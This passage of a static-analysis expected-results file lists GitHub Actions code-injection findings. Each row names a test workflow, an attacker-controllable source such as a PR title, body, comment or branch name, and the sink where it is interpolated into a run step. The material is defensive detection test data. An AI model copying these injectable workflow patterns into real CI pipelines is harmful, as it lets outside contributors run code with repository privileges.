| ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | 